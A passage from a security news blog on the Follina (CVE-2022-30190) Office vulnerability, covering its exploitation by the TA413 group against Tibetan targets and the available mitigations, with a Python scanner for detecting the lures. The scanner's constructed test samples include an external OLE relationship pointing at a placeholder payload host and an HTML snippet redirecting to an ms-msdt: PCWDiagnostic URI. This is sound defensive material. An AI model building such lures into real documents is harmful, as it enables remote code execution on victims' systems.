“Please note, it doesn’t matter which version of Office you have installed, or if you have it installed at all. The vulnerability can also be exploited through other attack vectors. That’s why we released a patch for Windows 7 where the ms-msdt: URL handler isn’t registered at all,” writes 0patch co-founder Mitja Kolsek.

Meanwhile, information security experts are already beginning to criticize Microsoft for its sluggishness and lack of fixes.

“Small security teams generally see Microsoft’s sloppiness as a sign that it’s ‘just another vulnerability,’ but it’s definitely not. It’s not clear why Microsoft continues to downplay this vulnerability, which is already being exploited in real attacks. It definitely doesn’t help the security teams,” said Jake Williams, principal cyber threat analyst at Scythe.

Chinese Hackers Attack Fresh 0-day Follina Vulnerability
https://gridinsoft.com/blogs/follina-0-day-vulnerability/ (Fri, 03 Jun 2022 10:32:03 +0000)

Experts have warned that Chinese hackers are already actively exploiting a 0-day vulnerability in Microsoft Office known as Follina to remotely execute malicious code on vulnerable systems.

Let me remind you that Follina became public only a few days ago, although researchers had first reported the bug to Microsoft back in April 2022, when Microsoft declined to acknowledge it as a problem. The vulnerability is now tracked as CVE-2022-30190: a crafted Word document, opened normally or merely previewed in File Explorer, invokes the ms-msdt: URL handler so that the Microsoft Support Diagnostic Tool (MSDT) executes attacker-supplied PowerShell commands.

The bug affects all versions of Windows that receive security updates, that is, Windows 7 and later, as well as Server 2008 and later.

Let me remind you that we also wrote about the Lapsus$ group stealing the source code of Microsoft products.

Experts had already warned that Follina is a worrying development because it opens a new attack vector through Microsoft Office: the bug needs no elevated privileges, evades Windows Defender, and does not require macros to be enabled in order to execute binaries or scripts.

As Proofpoint experts now report, the Chinese state-sponsored group TA413 has already taken advantage of Follina, targeting its attacks at the international Tibetan community.


Attackers distribute ZIP archives to victims that contain malicious Word documents designed to attack CVE-2022-30190. The decoys are disguised as messages from the Central Tibetan Administration and use the tibet-gov.web[.]app domain.

The well-known security researcher MalwareHunterTeam also reports finding DOCX documents with Chinese file names that deliver malicious payloads, including password-stealing malware, via the http://coolrat[.]xyz domain.
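Both Follina posts here describe the same on-disk artifacts: a Word document whose OLE object relationship points at an external HTML page, an ms-msdt: URI that hands MSDT attacker-controlled input (in the public sample, the PCWDiagnostic troubleshooter with IT_BrowseForFile parameters), and lures delivered inside ZIP archives. The Python scanner below is an added example written for this page, not Proofpoint's, MalwareHunterTeam's or any vendor's tooling. Every file it scans is constructed in memory, payload.invalid is a placeholder domain, and the samples carry only the indicator strings, not a working exploit.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Indicators of the Follina (CVE-2022-30190) chain described above: a .docx
# whose oleObject relationship targets an external URL, and an ms-msdt: URI
# that drives the PCWDiagnostic troubleshooter via IT_BrowseForFile.
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
RELS_PATH = "word/_rels/document.xml.rels"
MSDT_URI_RE = re.compile(rb"ms-msdt:", re.IGNORECASE)
MSDT_PARAM_RE = re.compile(rb"PCWDiagnostic|IT_(?:Re)?BrowseForFile", re.IGNORECASE)


def external_ole_targets(docx_bytes):
    """Targets of oleObject relationships marked TargetMode="External"."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if RELS_PATH not in z.namelist():
            return []
        root = ET.fromstring(z.read(RELS_PATH))
    return [rel.get("Target", "")
            for rel in root.iter(f"{{{RELS_NS}}}Relationship")
            if rel.get("Type") == OLE_REL and rel.get("TargetMode") == "External"]


def scan_bytes(name, data):
    """Return (name, reason) findings for a docx, an rtf/html blob or a zip.

    Plain archives are unpacked in memory and each member scanned, so a lure
    delivered as a ZIP containing a .docx is reported as mail.zip/lure.docx.
    """
    findings = []
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            names = z.namelist()
            if RELS_PATH in names:  # OOXML document: inspect its relationships
                for target in external_ole_targets(data):
                    if target.lower().startswith(("http://", "https://")):
                        findings.append((name, "external OLE object -> " + target))
            else:  # ordinary archive: recurse into members
                for member in names:
                    if not member.endswith("/"):
                        findings.extend(scan_bytes(name + "/" + member, z.read(member)))
        return findings
    if MSDT_URI_RE.search(data):
        findings.append((name, "ms-msdt: URI"))
    if MSDT_PARAM_RE.search(data):
        findings.append((name, "MSDT PCWDiagnostic / IT_BrowseForFile parameters"))
    return findings


# --- constructed samples: not real malware, placeholder domain ---
def make_zip(members):
    """Build an in-memory ZIP from a {name: content} mapping."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for member, content in members.items():
            z.writestr(member, content)
    return buf.getvalue()


def make_docx(rels_xml):
    """Minimal .docx skeleton: just enough parts for the relationship scan."""
    return make_zip({
        "[Content_Types].xml": "<Types/>",
        "word/document.xml": "<w:document/>",
        RELS_PATH: rels_xml,
    })


MALICIOUS_RELS = (
    f'<Relationships xmlns="{RELS_NS}">'
    f'<Relationship Id="rId996" Type="{OLE_REL}" '
    'Target="http://payload.invalid/lure.html!" TargetMode="External"/>'
    "</Relationships>"
)
BENIGN_RELS = (
    f'<Relationships xmlns="{RELS_NS}">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
    'officeDocument/2006/relationships/image" Target="media/image1.png"/>'
    "</Relationships>"
)
LURE_HTML = (b'<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force '
             b'/param \\"IT_RebrowseForFile=? IT_BrowseForFile=...\\"";</script>')


def demo():
    """Scan the constructed samples; returns {sample: [(name, reason), ...]}."""
    return {
        "lure.docx": scan_bytes("lure.docx", make_docx(MALICIOUS_RELS)),
        "benign.docx": scan_bytes("benign.docx", make_docx(BENIGN_RELS)),
        "lure.html": scan_bytes("lure.html", LURE_HTML),
        "mail.zip": scan_bytes("mail.zip", make_zip({"lure.docx": make_docx(MALICIOUS_RELS)})),
    }


if __name__ == "__main__":
    for sample, hits in demo().items():
        print(sample, hits or "clean")
```

The relationship check is the durable part: an OLE object in a Word document that points at an http(s) URL is unusual in legitimate mail and is what the exploit needs in order to fetch the page carrying the ms-msdt: URI, so it keeps working even if the HTML side of the chain is obfuscated. The string patterns are cheap second-stage indicators for the fetched page and for RTF lures, and the ZIP recursion reflects how the TA413 lures were delivered.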

Since there is no patch for Follina yet, administrators and users can block attacks on CVE-2022-30190 by disabling the ms-msdt: URL protocol handler, which the exploit uses to launch MSDT and execute code on vulnerable systems. Disabling the preview pane in Windows Explorer is also recommended, because previewing a file is enough to trigger the attack.
